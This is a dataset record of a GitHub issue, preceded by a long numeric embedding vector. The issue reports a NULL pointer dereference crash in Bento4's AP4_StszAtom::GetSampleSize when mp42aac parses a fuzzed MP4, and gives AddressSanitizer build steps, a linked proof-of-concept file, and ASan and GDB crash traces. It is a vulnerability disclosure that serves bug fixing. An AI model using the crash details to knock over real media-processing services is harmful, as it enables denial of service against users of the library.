-0.011463001370429993, -0.007389372680336237, -0.008912429213523865, 0.009961807169020176, -0.012257322669029236, -0.011965828947722912, -0.00564769608899951, 0.028755882754921913, -0.004405203275382519, -0.011397415772080421, 0.008241992443799973, 0.0037256577052176, -0.006810028571635485, -0.0016770014772191644, -0.012709137983620167, -0.04500667378306389, 0.012592541053891182, 0.011994978412985802, -0.006186960265040398, -0.020127661526203156, 0.011506726033985615, 0.010406335815787315, -0.0010247835889458656, 0.017926881089806557, 0.01320467796176672, -0.009867072105407715, -0.020302556455135345, 0.008504337631165981, 0.0028621067758649588, -0.02241588942706585, 0.02146853320300579, 0.02509763278067112, -0.004663904197514057, 0.0038477207999676466, 0.009050888940691948, 0.012395782396197319, 0.0012570678954944015, -0.009816060774028301, -0.00020028825383633375, 0.0052140988409519196, 0.017081547528505325, 0.00028101843781769276, 0.012002265080809593, -0.006897476967424154, -0.032997120171785355, 0.0008662837208248675, -0.001563136582262814, 0.013452447950839996, 0.009182061068713665, -0.006132305134087801, 0.00036505068419501185, 0.003184571862220764, -0.004973616451025009, -0.024354323744773865, -0.008278429508209229, -0.0010311600053682923, 0.008606360293924809, 0.025257954373955727, 0.008752107620239258, 0.002160699339583516, -0.002370210597291589, 0.0052286735735833645, -0.0021297279745340347, 0.02754618227481842, -0.012898609042167664, -0.02409197948873043, 0.005225029774010181, 0.015099389478564262, 0.012424931861460209, 0.0042776744812726974, 0.000511480902787298, -0.023290371522307396, 0.004980903584510088, 0.016731755807995796, -0.0012151655973866582, -0.012373920530080795, -0.010748840868473053, 0.0032683764584362507, -0.0012142546474933624, -0.00690112030133605, -0.008606360293924809, -0.023144623264670372, -0.02981983684003353, -0.0074513154104352, -0.012803873978555202, 0.02450007013976574, -0.0010584875708445907, -0.01487348135560751, 0.0055602481588721275, -0.013627344742417336, -0.010362612083554268, -0.0240774042904377, 0.0060302820056676865, -0.019632121548056602, 0.017781134694814682, 0.013037068769335747, -0.022313864901661873, -0.02264908328652382, 0.013678356073796749, 0.0016760905273258686, 0.008307578973472118, 0.0039497436955571175, 0.005815305281430483, -0.03238498419523239, -0.007957786321640015, -0.006427442654967308, 0.019267752766609192, 0.0028293137438595295, -0.014618423767387867, 0.0040991343557834625, -0.009509991854429245, 0.010748840868473053, 0.002406647428870201, -0.0000070952032729110215, -0.016119617968797684, 0.002924049273133278, -0.007025005295872688, -0.02146853320300579, -0.0069994996301829815, -0.017562514171004295, -0.01347430981695652, -0.010989324189722538, -0.006314488593488932, -0.0003504759806673974, 0.020492028445005417, 0.017970604822039604, -0.012097001075744629, -0.015609503723680973, -0.006099511869251728, 0.0289745032787323, -0.002692675916478038, 0.014509113505482674, -0.022882279008626938, 0.013044356368482113, -0.01849529519677162, -0.0024194002617150545, -0.018218375742435455, 0.007957786321640015, -0.0029112964402884245, -0.005603972356766462, 0.010843576863408089, -0.010508358478546143, 0.000313583790557459, -0.0042958930134773254, 0.012381207197904587, 0.018043478950858116, -0.01397713739424944, 0.010894588194787502, 0.006401936989277601, 0.0002023378328885883, 0.0069849248975515366, 0.01511396374553442, -0.007239982020109892, -0.026015838608145714, 0.009473554790019989, 0.0039497436955571175, 0.0003830413334071636, -0.029178548604249954, 0.0073310742154717445, -0.020404579117894173, -0.025549449026584625, 0.0006349103641696274, -0.028187470510601997, -0.009786911308765411, -0.02933887019753456, 0.005403569899499416, 0.015565779991447926, 0.006489385385066271, 0.0013791309902444482, -0.003570801578462124, 0.013000632636249065, 0.005221386440098286, 0.005177662242203951, 0.0004891633871011436, -0.002412112895399332, -0.0019220386166125536, -0.010129416361451149, -0.009429831057786942, 0.014888055622577667, -0.04908759146928787, 0.021497681736946106, 0.01585727371275425, 0.007298280950635672, -0.027400435879826546, -0.010748840868473053, 0.011127783916890621, 0.017635386437177658, -0.008482475765049458, 0.012424931861460209, -0.014705872163176537, -0.025622323155403137, 0.017445916309952736, 0.014472677372395992, 0.01948637329041958, -0.004299536347389221, 0.014691297896206379, 0.007702728733420372, -0.020608626306056976, -0.026817448437213898, 0.0031062329653650522, 0.01836412213742733, 0.005472799763083458, -0.00042016126099042594, -0.03320116549730301, -0.001220631180331111, -0.008322153240442276, 0.023479841649532318, 0.012286472134292126, 0.012359345331788063, -0.015871848911046982, 0.007753740530461073, -0.001201501814648509, -0.01508481428027153, -0.01469858456403017, -0.008992590010166168, -0.00035685242619365454, -0.01099661085754633, -0.01004196796566248, -0.010683255270123482, 0.016906652599573135, 0.004456214606761932, 0.0057205697521567345, -0.002264543902128935, -0.0010721513535827398, 0.017679112032055855, 0.021264487877488136, 0.01740219257771969, -0.009619302116334438, -0.009240359999239445, -0.016075894236564636, 0.0027910550124943256, -0.0017926881555467844, -0.0276044812053442, 0.023348668590188026, 0.01225003506988287, 0.021235337480902672, -0.031335603445768356, -0.01219173613935709, 0.023028025403618813, 0.024485496804118156, 0.034075647592544556, -0.0061978911980986595, 0.004707627929747105, -0.02522880584001541, 0.011149645783007145, -0.009327808395028114, 0.00616874173283577, -0.01448725163936615, -0.003459669416770339, -0.018582742661237717, -0.0013253868091851473, -0.03267647698521614, -0.004988191183656454, -0.0034560258500277996, -0.027735654264688492, -0.011273530311882496, -0.022692807018756866, -0.0031153422314673662, -0.012650839984416962, 0.01251966692507267, -0.00010077038314193487, 0.0014948176685720682, -0.016367388889193535, -0.0008886012365110219, 0.004871593322604895, 0.013765804469585419, -0.0317145474255085, 0.0050647081807255745, -0.02611786313354969, -0.025724345818161964, 0.01374394167214632, 0.012723713181912899, -0.00013663781282957643, -0.0232466459274292, -0.006875614635646343, -0.017985180020332336, 0.018145501613616943, -0.006434730254113674, 0.0014611136866733432, 0.0030278938356786966, -0.0001120999368140474, -0.007349292282015085, 0.010537507943809032, -0.005305190570652485, -0.013671068474650383, 0.009830635040998459, -0.013634631410241127, -0.03130645677447319, 0.005680489353835583, 0.002668991917744279, -0.018262099474668503, 0.011790932156145573, 0.015871848911046982, -0.009043601341545582, 0.017212720587849617, 0.02455836907029152, 0.01186380535364151, 0.002904009073972702, -0.004642041865736246, -0.004795076325535774, 0.015405457466840744, 0.003909663297235966, -0.007178039755672216, 0.021964073181152344, 0.009604726918041706, -0.0036837554071098566, -0.000021008063413319178, -0.007396660279482603, 0.01728559471666813, 0.02635105699300766, 0.03815656527876854, -0.0021169751416891813, 0.0016624267445877194, -0.012687276117503643, -0.011798219755291939, 0.005797086749225855, 0.015813549980521202, -0.01871391572058201, -0.016804629936814308, -0.006806384772062302, 0.0003803085710387677, 0.0055602481588721275, -0.012104288674890995, 0.001046645687893033, 0.016046743839979172, 0.012949621304869652, 0.004248525016009808, -0.01610504277050495, -0.00742216594517231, -0.00033430717303417623, 0.01735846698284149, 0.006558614782989025, -0.025432851165533066, -0.008358590304851532, 0.005877247545868158, 0.0376901738345623, 0.007761027663946152, 0.004226663149893284, -0.0005820770747959614, -0.0012807517778128386, 0.004518156871199608, -0.022619934752583504, 0.013656494207680225, -0.002987813437357545, 0.004182938951998949, 0.010544795542955399, -0.0047367773950099945, -0.003614525543525815, 0.009495416656136513, 0.026511378586292267, 0.012599827721714973, -0.01138284057378769, 0.0007123384857550263, -0.009641163982450962, 0.012446793727576733, 0.01859731785953045, 0.006653350777924061, -0.009123762138187885, -0.018815938383340836, -0.01996733993291855, -0.00019379796867724508, 0.0024503713939338923, -0.01036989875137806, -0.015653228387236595, 0.011084059253334999, 0.009320520795881748, 0.03422139585018158, 0.013700217939913273, -0.017606237903237343, 0.004999122116714716, 0.008497050032019615, -0.002033170545473695, -0.008985302411019802, 0.016309089958667755, 0.0005834434414282441, -0.0008640064625069499, -0.008139969781041145, 0.0009259489015676081, -0.006977637764066458, 0.01427591871470213, 0.006875614635646343, 0.004252168815582991, 0.02021510899066925, 0.00515579991042614, -0.000998366973362863, 0.02671542577445507, 0.01884508691728115, -0.015507481060922146, 0.014501826837658882, -0.014851619489490986, -0.008890567347407341, -0.006718936841934919, 0.0012297403300181031, 0.002658060984686017, -0.010901875793933868, -0.01913658156991005, 0.012796586379408836, 0.0008917894447222352, 0.003029715735465288, 0.013845965266227722, -0.03372585400938988, -0.00584081094712019, -0.01096746139228344, 0.008176406845450401, 0.010617668740451336, -0.0019293258665129542, 0.005633121356368065, 0.0009546428336761892, 0.01574067585170269, 0.016717180609703064, -0.012942333705723286, 0.009582865051925182, 0.0006376430974341929, -0.00679545383900404, 0.004696696996688843, -0.007469533942639828, -0.018291248008608818, 0.006482097785919905, -0.005880891345441341, -0.020185958594083786, -0.02141023427248001, 0.007371154613792896, -0.011193369515240192, -0.0019566535484045744, -0.017751984298229218, 0.010413623414933681, 0.0175187885761261, -0.01001281850039959, 0.02540370263159275, -0.0058116614818573, 0.01932605169713497, -0.007578844204545021, 0.011718058958649635, -0.008832268416881561, -0.019777867943048477, -0.010420910082757473, -0.006063075270503759, -0.010377186350524426, -0.017751984298229218, -0.027094367891550064, -0.012140724807977676, 0.023115474730730057, 0.005429075565189123, -0.004015329759567976, 0.006944844499230385, -0.015565779991447926, 0.000902265019249171, 0.00008727740350877866, 0.01388968899846077, -0.005673201754689217, -0.01168162189424038, -0.0030406469013541937, -0.012140724807977676, 0.014203045517206192, 0.008409601636230946, -0.015638653188943863, -0.01740219257771969, -0.004521800670772791, 0.0029331583064049482, 0.01853901892900467, -0.011470288969576359, 0.0026179805863648653, 0.011098634451627731, -0.0019311477662995458, -0.02426687628030777, -0.012475943192839622, -0.005640408955514431, 0.010872726328670979, 0.006059431470930576, 0.022197268903255463, -0.0006868327618576586, 0.008744820021092892, 0.012271897867321968, 0.013496172614395618, -0.02206609584391117, 0.01186380535364151, 0.010165853425860405, -0.004489007405936718, -0.014618423767387867, -0.01448725163936615, -0.0041173528879880905, -0.01674633100628853, -0.005356202367693186, -0.005669558420777321, 0.01442895270884037, 0.024529220536351204, 0.022372163832187653, -0.0322100855410099, -0.007629855535924435, 0.0002837512001860887, 0.003749341471120715, -0.010027393698692322, 0.006055787671357393, 0.003884157631546259, 0.001867383485659957, -0.018524443730711937, -0.011062197387218475, 0.014050010591745377, 0.027050642296671867, -0.009335095062851906, -0.017373042181134224, 0.034192245453596115, -0.008497050032019615, 0.012650839984416962, 0.009145624004304409, 0.013758516870439053, 0.010894588194787502, 0.02063777483999729, -0.028289493173360825, 0.0007337450515478849, -0.01437065377831459, -0.010085692629218102, 0.009568290784955025, -0.0006066719070076942, -0.003270198358222842, 0.0033612900879234076, -0.022168118506669998, 0.021249912679195404, 0.0146329989656806, -0.024660391733050346, 0.007753740530461073, -0.02498103491961956, -0.006041212938725948, -0.01961754634976387, 0.026817448437213898, 0.009211210533976555, 0.0227073822170496, 0.006176029331982136, -0.030198778957128525, 0.007323786616325378, -0.0055602481588721275, 0.0019147512502968311, 0.004106421954929829, -0.004470789339393377, 0.02457294426858425, -0.009546428918838501, 0.006489385385066271, 0.0014729555696249008, 0.0058663166128098965, 0.006307201460003853, 0.01705239899456501, 0.0052286735735833645, -0.007214476354420185, 0.008970728144049644, -0.0037712035700678825, -0.005148512776941061, 0.0013818637235090137, 0.019690420478582382, 0.021658003330230713, -0.0062124659307301044, -0.021191613748669624, 0.004999122116714716, -0.0028967217076569796, 0.02235759049654007, 0.009364244528114796, -0.012884034775197506, -0.029003653675317764, -0.0008271142141893506, 0.011667047627270222, 0.005709638819098473, 0.011914817616343498, 0.010384473949670792, -0.02648223005235195, -0.02808544598519802, 0.0020659638103097677, -0.018101777881383896, -0.005443650297820568, -0.009619302116334438, -0.0033940833527594805, -0.016644306480884552, 0.0008385007386095822, 0.006125017534941435, 0.001616880763322115, -0.0005479176179505885, -0.002987813437357545, 0.012614402920007706, -0.006063075270503759, -0.013248402625322342, 0.0012570678954944015, 0.011834656819701195, 0.014006286859512329, -0.010945599526166916, -0.028274917975068092, 0.019515523687005043, -0.009342382661998272, -0.006565902382135391, 0.0031426697969436646, -0.008897854015231133, 0.02033170685172081, -0.008154544979333878, 0.005130294244736433, -0.004809651058167219, -0.007174395956099033, 0.01168162189424038, 0.005928259342908859, -0.0005989290657453239, 0.008912429213523865, 0.006970350164920092, -0.0027127161156386137, 0.004219375550746918, 0.03358010947704315, -0.028464389964938164, 0.013088081032037735, 0.016644306480884552, -0.0032155432272702456, 0.0000812994985608384, 0.013758516870439053, -0.007447671610862017, 0.013153666630387306, -0.005163087509572506, 0.0006007509073242545, 0.020652350038290024, 0.01907828263938427, -0.010712404735386372, -0.00414650235325098, 0.0024922736920416355, 0.03372585400938988, -0.012898609042167664, -0.0018027082551270723, -0.0055238110944628716, -0.0012078782310709357, -0.007578844204545021, -0.016367388889193535, -0.019690420478582382, -0.013787666335701942, -0.00878854375332594, 0.019471799954771996, -0.0009956342400982976, -0.012301046401262283, 0.007061442360281944, 0.019107431173324585, -0.005920971743762493, -0.020462878048419952, -0.009517279453575611, -0.004962685517966747, -0.024485496804118156, 0.01735846698284149, 0.002455836860463023, 0.006135948933660984, 0.010909163393080235, -0.005101144779473543, 0.003266554558649659, 0.010195002891123295, -0.009765049442648888, -0.007385729346424341, 0.007812038995325565, -0.024820713326334953, -0.01574067585170269, -0.004088203422725201, 0.0005861762329004705, -0.011994978412985802, 0.015478331595659256, -0.01317552849650383, -0.0039169504307210445, -0.014953642152249813, 0.0019129293505102396, -0.003160888096317649, -0.012352058663964272, -0.0018054409883916378, 0.010129416361451149, -0.007349292282015085, 0.013722079806029797, 0.03690313920378685, -0.02820204384624958, 0.02004021219909191, 0.008781257085502148, 0.03226838633418083, -0.007571556605398655, -0.014450815506279469, -0.0007688154000788927, 0.004139214754104614, -0.021381085738539696, 0.00009911934466799721, -0.006711649242788553, -0.0097140371799469, -0.0014155677054077387, 0.01783943362534046, 0.009400681592524052, 0.009786911308765411, -0.0024540151935070753, -0.02552030049264431, 0.02152683213353157, 0.019704993814229965, 0.013751229271292686, 0.010799853131175041, -0.003516146447509527, -0.02164342999458313, 0.0030005662702023983, 0.008875992149114609, 0.008234705775976181, -0.0030151410028338432, 0.0011413812171667814, -0.001876492635346949, -0.019209453836083412, -0.0256951954215765, -0.012002265080809593, 0.0011887489818036556, 0.012854885309934616, 0.011411990039050579, -0.009561003185808659, -0.005669558420777321, -0.0005706906085833907, -0.0027728367131203413, 0.02473326586186886, -0.015157688409090042, -0.02366931363940239, 0.007549694739282131, -0.008730245754122734, 0.007418522145599127, -0.006500316318124533, -0.017066974192857742, -0.001621435396373272, 0.00633270712569356, -0.010078405030071735, 0.028391515836119652, 0.015551204793155193, -0.009553715586662292, 0.013211965560913086, 0.01639653742313385, 0.03404650092124939, 0.008883279748260975, -0.000531065627001226, 0.010974748991429806, 0.01616334170103073, -0.008446038700640202, -0.011003898456692696, -0.013583620078861713, -0.014509113505482674, 0.01579897478222847, -0.019777867943048477, 0.010675967670977116, -0.0007009519613347948, 0.004977260250598192, 0.011127783916890621, 0.025840943679213524, 0.010224152356386185, 0.007054154761135578, 0.0020969349425286055, 0.010821714997291565, 0.00022044233628548682, -0.013051643967628479, -0.02361101470887661, -0.015536630526185036, -0.009488129988312721, 0.009174773469567299, 0.009495416656136513, 0.0041319276206195354, 0.021541407331824303, 0.02868301048874855, 0.007855763658881187, -0.00977233611047268, 0.03480438515543938, 0.009983669966459274, 0.006223396863788366, 0.01686292700469494, -0.005636765155941248, -0.013190103694796562, 0.014611137099564075, 0.016411112621426582, 0.0009646629332564771, 0.003643675008788705, 0.017066974192857742, -0.00011204300972167403, -0.002055032644420862, 0.00728735001757741, -0.01759166270494461, -0.0023774979636073112, -0.020550327375531197, 0.01668803207576275, 0.025374552235007286, 0.0019621190149337053, -0.005225029774010181, 0.011113208718597889, 0.024995610117912292, 0.01610504277050495, 0.0014756884193047881, -0.001655139378271997, -0.03462948650121689, 0.009546428918838501, 0.01472773402929306, -0.028289493173360825, 0.011244380846619606, 0.009925371035933495, 0.02008393593132496, -0.0022809405345469713, -0.00022215030912775546, -0.006369143724441528, -0.006234327796846628, -0.015536630526185036, 0.007549694739282131, -0.006427442654967308, 0.01782485842704773, -0.02463124319911003, 0.010748840868473053, 0.010508358478546143, -0.01955924741923809, -0.0023629232309758663, 0.02343611791729927, -0.0009519101004116237, -0.001259800628758967, -0.022940577939152718, -0.014924492686986923, -0.014297780580818653, -0.005498305428773165, -0.010522933676838875, 0.0030169629026204348, -0.0018491650698706508, -0.011178795248270035, -0.019296903163194656, -0.006460235919803381, -0.016236215829849243, 0.0035653358791023493, -0.009393393993377686, 0.012075139209628105, -0.03296796977519989, 0.0076735797338187695, 0.0063582127913832664, -0.003844077233225107, 0.011222518980503082, -0.00019265931041445583, -0.019515523687005043, -0.009123762138187885, -0.01877221278846264, 0.017023250460624695, 0.009342382661998272, 0.00038691272493451834, -0.016425687819719315, -0.0024722334928810596, -0.009378819726407528, 0.010552083142101765, -0.006828247103840113, -0.024543795734643936, 0.02420857734978199, 0.0011313611175864935, 0.002180739538744092, -0.00941525585949421, -0.003310278756543994, 0.014450815506279469, 0.012315621599555016, -0.0013572688912972808, 0.0009974560234695673, -0.015070240013301373, 0.0016296335961669683, -0.010748840868473053, 0.004871593322604895, -0.010246014222502708, 0.010092979297041893, 0.009072750806808472, -0.00036391205503605306, 0.005461868830025196, -0.004376053810119629, -0.009422543458640575, 0.01681920327246189, 0.0259866900742054, -0.011463001370429993, -0.004995478317141533, 0.007549694739282131, -0.0032774857245385647, 0.013372287154197693, -0.0065076034516096115, -0.012949621304869652, -0.01735846698284149, -0.025359978899359703, 0.02766278013586998, -0.008817693218588829, -0.000170000217622146, -0.023217497393488884, -0.012352058663964272, 0.018553592264652252, 0.014283206313848495, -0.028362365439534187, 0.0026525952853262424, 0.004110065288841724, -0.01692122593522072, 0.017737409099936485, -0.010792565532028675, 0.016804629936814308, -0.005407213699072599, 0.001012941705994308, 0.026030413806438446, 0.011105921119451523, 0.013955275528132915, 0.018743064254522324, 0.017897730693221092, -0.008540773764252663, -0.012971483170986176, -0.001220631180331111, 0.014800608158111572, 0.009961807169020176, -0.017562514171004295, -0.0035635142121464014, -0.02879960648715496, -0.008373165503144264, 0.0002876225917134434, -0.009335095062851906, 0.0005725124501623213, 0.009947232902050018, -0.0040809158235788345, 0.007134315557777882, 0.003239226993173361, -0.00862093549221754, 0.004110065288841724, 0.01801432855427265, -0.02229929156601429, 0.002339239465072751, -0.004729490261524916, -0.016250791028141975, -0.006336350925266743, 0.05048676207661629, 0.005979270674288273, 0.01817465014755726, -0.017926881089806557, -0.009138337336480618, 0.014326930046081543, 0.0014775102026760578, -0.013598195277154446, -0.0024685899261385202, -0.020594051107764244, -0.007137959357351065, -0.005418144632130861, 0.004725846461951733, -0.008271141909062862, -0.009065463207662106, 0.003286594757810235, 0.007578844204545021, 0.0065440405160188675, -0.0038768702652305365, -0.014334217645227909, 0.00005092604988021776, -0.00025733455549925566, 0.00968488771468401, -0.018145501613616943, 0.006890189368277788, 0.0036946863401681185, 0.0036928646732121706, -0.03352180868387222, 0.004718559328466654, 0.003339428221806884, 0.01764996163547039, -0.013794953934848309, -0.013692930340766907, -0.011601461097598076, 0.010428197681903839, 0.014210332185029984, 0.014880768954753876, 0.024602092802524567, -0.011164220049977303, -0.00011278312740614638, -0.002016774145886302, -0.002514135790988803, -0.016600582748651505, 0.010122128762304783, -0.02002563700079918, 0.020302556455135345, -0.0007802019244991243, 0.0338716022670269, 0.024645818397402763, 0.004948110785335302, -0.011135070584714413, 0.0035434740129858255, -0.002619802253320813, 0.014509113505482674, -0.013641919009387493, 0.001949366182088852, 0.005797086749225855, -0.009196635335683823, -0.021483108401298523, -0.0010921915527433157, 0.001563136582262814, 0.0007656271918676794, -0.014137458987534046, 0.0037183703389018774, -0.01724187098443508, -0.007680866867303848, 0.016046743839979172, 0.0060521443374454975, -0.013984424993395805, 0.033959049731492996, -0.003734766971319914, 0.010807139798998833, -0.00047458865446969867, -0.008482475765049458, -0.0034104797523468733, -0.039555735886096954, -0.0027764802798628807, -0.02665712684392929, 0.008314866572618484, 0.00423030648380518, -0.024412622675299644, -0.009036313742399216, 0.01388968899846077, -0.0031390259973704815, 0.029790686443448067, -0.0011650650994852185, 0.0030260721687227488, -0.0071816835552453995, -0.0016997744096443057, -0.0012470477959141135, 0.023713037371635437, -0.004182938951998949, -0.017489640042185783, -0.014618423767387867, 0.019821591675281525, 0.0020914694759994745, 0.003986180294305086, 0.006791810039430857, 0.001809084671549499, 0.0008890567114576697, 0.013088081032037735, 0.0005178573192097247, -0.01818922534584999, -0.00630355766043067, 0.010063830763101578, -0.005225029774010181, 0.03856465592980385, -0.01913658156991005, -0.019763292744755745, 0.008402314968407154, 0.003383152186870575, -0.0058845351450145245, -0.011601461097598076, -0.02438347227871418, 0.023538140580058098, 0.011936679482460022, 0.001742587541230023, -0.024470921605825424, -0.005698707886040211, 0.012271897867321968, -0.008453326299786568, -0.010464634746313095, 0.01156502403318882, 0.001046645687893033, -0.014312355779111385, -0.002300980733707547, 0.004929892253130674, 0.020535752177238464, 0.018641041591763496, -0.005181306041777134, -0.010136703960597515, -0.002774658612906933, 0.008344016037881374, 0.022678233683109283, 0.026380207389593124, 0.00611044280230999, -0.015813549980521202, 0.015696952119469643, 0.0007319232099689543, 0.004795076325535774, 0.010391761548817158, 0.038302309811115265, -0.009859784506261349, -0.008992590010166168, 0.0018473431700840592, 0.011441139504313469, 0.0014565590536221862, -0.0034869969822466373, -0.008927003480494022, -0.00037894220440648496, 0.020258832722902298, 0.018349546939134598, 0.006135948933660984, -0.008868704549968243, 0.0063436380587518215, 0.028653860092163086, 0.008875992149114609, 0.02648223005235195, -0.02068149857223034, 0.00715253408998251, 0.009626589715480804, 0.021016716957092285, 0.005399926565587521, -0.03028622642159462, -0.008533487096428871, 0.003681933507323265, 0.002668991917744279, 0.006074006203562021, 0.02122076228260994, -0.010544795542955399, -0.029440894722938538, -0.012060564011335373, -0.005520167760550976, -0.010821714997291565, 0.009816060774028301, 0.001278019044548273, 0.013962562195956707, 0.006642419379204512, 0.020069362595677376, 0.012512380257248878, 0.009910795837640762, 0.022095244377851486, -0.019180305302143097, -0.0010994789190590382, 0.01093831192702055, 0.00038577409577555954, -0.017664536833763123, -0.008263855241239071, 0.016207067295908928, -0.0007146157440729439, 0.009393393993377686, -0.011783644556999207, 0.008861417882144451, 0.008693808689713478, -0.008402314968407154, 0.01996733993291855, 0.005833523813635111, -0.0023337737657129765, 0.021658003330230713, -0.007607993204146624, 0.02426687628030777, -0.018684765323996544, -0.011885668151080608, -0.003855008166283369 ]
265
null
null
null
null
null
null
null
null
null
[ "axiomatic-systems", "Bento4" ]
Hi I found an crash erro. System info: Ubuntu 20.04 : clang 10.0.0 , gcc 9.3.0 Bento4 version 1.6.0.0 commit:0c7705733de80172712e487dd6fdd28387fd7184 [poc.zip](https://github.com/axiomatic-systems/Bento4/files/6463812/poc1.zip) ------------------------------------------ Verification steps: 1.Get the source code of Bento4 2.Compile the Bento4 ```bash $ cd Bento4 $ mkdir check_build && cd check_build $ cmake ../ -DCMAKE_C_COMPILER=clang -DCMAKE_CXX_COMPILER=clang++ -DCMAKE_C_FLAGS="-fsanitize=address" -DCMAKE_CXX_FLAGS="-fsanitize=address" $ make -j 32 ``` 3.run mp42aac ```bash $ ./mp42aac poc.mp4 ``` asan ```bash Audio Track: duration: 0 ms sample count: 255 AddressSanitizer:DEADLYSIGNAL ================================================================= ==2609245==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000006939ae bp 0x7fffb9ecb3f0 sp 0x7fffb9ecb250 T0) ==2609245==The signal is caused by a READ memory access. ==2609245==Hint: address points to the zero page. #0 0x6939ae in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 #1 0x57553f in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4AtomSampleTable.cpp:162:30 #2 0x523d78 in AP4_Track::GetSample(unsigned int, AP4_Sample&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4Track.cpp:435:43 #3 0x523d78 in AP4_Track::ReadSample(unsigned int, AP4_Sample&, AP4_DataBuffer&) /home/hh/Downloads/Bento4/Source/C++/Core/Ap4Track.cpp:469:14 #4 0x4c8239 in WriteSamples(AP4_Track*, AP4_SampleDescription*, AP4_ByteStream*) /home/hh/Downloads/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:192:12 #5 0x4c8239 in main /home/hh/Downloads/Bento4/Source/C++/Apps/Mp42Aac/Mp42Aac.cpp:281:13 #6 0x7ff7705870b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #7 0x41c8ad in _start (/home/hh/Downloads/Bento4/afl_fuzz/mp42aac+0x41c8ad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/hh/Downloads/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154:27 in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==2609245==ABORTING ``` gdb info ```bash Audio Track: duration: 0 ms sample count: 255 Program received signal SIGSEGV, Segmentation fault. [----------------------------------registers-----------------------------------] RAX: 0x0 RBX: 0x7fffffffddc0 --> 0x1 RCX: 0xc0e000000a6 --> 0x0 RDX: 0x7fffffffddb0 --> 0x60c000000000 --> 0xcc6e96b9 --> 0x0 RSI: 0x0 RDI: 0x607000000530 --> 0x0 RBP: 0x7fffffffde70 --> 0x7fffffffe1b0 --> 0x0 RSP: 0x7fffffffdcd0 --> 0xe60e4 RIP: 0x6939ae (<AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+302>: mov r8d,DWORD PTR [r8]) R8 : 0x0 R9 : 0x480 R10: 0x7fffffffdce0 --> 0x41b58ab3 R11: 0xffffffffbb0 --> 0x0 R12: 0x7fffffffddb0 --> 0x60c000000000 --> 0xcc6e96b9 --> 0x0 R13: 0xffffffffbb6 --> 0x0 R14: 0x10007fff7b9c --> 0xf204f204f1f1f1f1 R15: 0x7fffffffdd80 --> 0x0 EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x69399e <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+286>: mov sil,BYTE PTR [rsi+0x7fff8000] 0x6939a5 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+293>: test sil,sil 0x6939a8 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+296>: jne 0x693a52 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+466> => 0x6939ae <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+302>: mov r8d,DWORD PTR [r8] 0x6939b1 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+305>: jmp 0x6939bb <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+315> 0x6939b3 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+307>: mov eax,0xfffffff4 0x6939b8 <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+312>: xor r8d,r8d 0x6939bb <AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&)+315>: mov rcx,rdx [------------------------------------stack-------------------------------------] 0000| 0x7fffffffdcd0 --> 0xe60e4 0008| 0x7fffffffdcd8 --> 0x575540 (<AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&)+3552>: test eax,eax) 0016| 0x7fffffffdce0 --> 0x41b58ab3 0024| 0x7fffffffdce8 --> 0x71be85 ("10 32 4 9 chunk:104 48 4 8 skip:104 64 4 8 desc:104 80 8 10 offset:112 112 4 13 offset_32:114 128 4 8 size:124 144 4 14 cts_offset:140 160 8 7 dts:141 192 4 12 duration:142 208 4 15 sample_size:158") 0032| 0x7fffffffdcf0 --> 0x574760 (<AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&)>: lea rsp,[rsp-0x98]) 0040| 0x7fffffffdcf8 --> 0x60c000000100 --> 0x7059d0 --> 0x505850 (<AP4_MpegAudioSampleDescription::~AP4_MpegAudioSampleDescription()>: lea rsp,[rsp-0x98]) 0048| 0x7fffffffdd00 --> 0x1 0056| 0x7fffffffdd08 --> 0xfffffffffffffffe [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00000000006939ae in AP4_StszAtom::GetSampleSize (this=<optimized out>, sample=<optimized out>, sample_size=@0x7fffffffddb0: 0x0) at /home/hh/Downloads/Bento4/Source/C++/Core/Ap4StszAtom.cpp:154 154 sample_size = m_Entries[sample - 1]; ```
NULL pointer dereference of Ap4StszAtom.cpp in function GetSampleSize
https://api.github.com/repos/axiomatic-systems/Bento4/issues/602/comments
1
2021-05-12T06:11:50
2021-07-24T18:23:50Z
https://github.com/axiomatic-systems/Bento4/issues/602
889,698,306
602
false
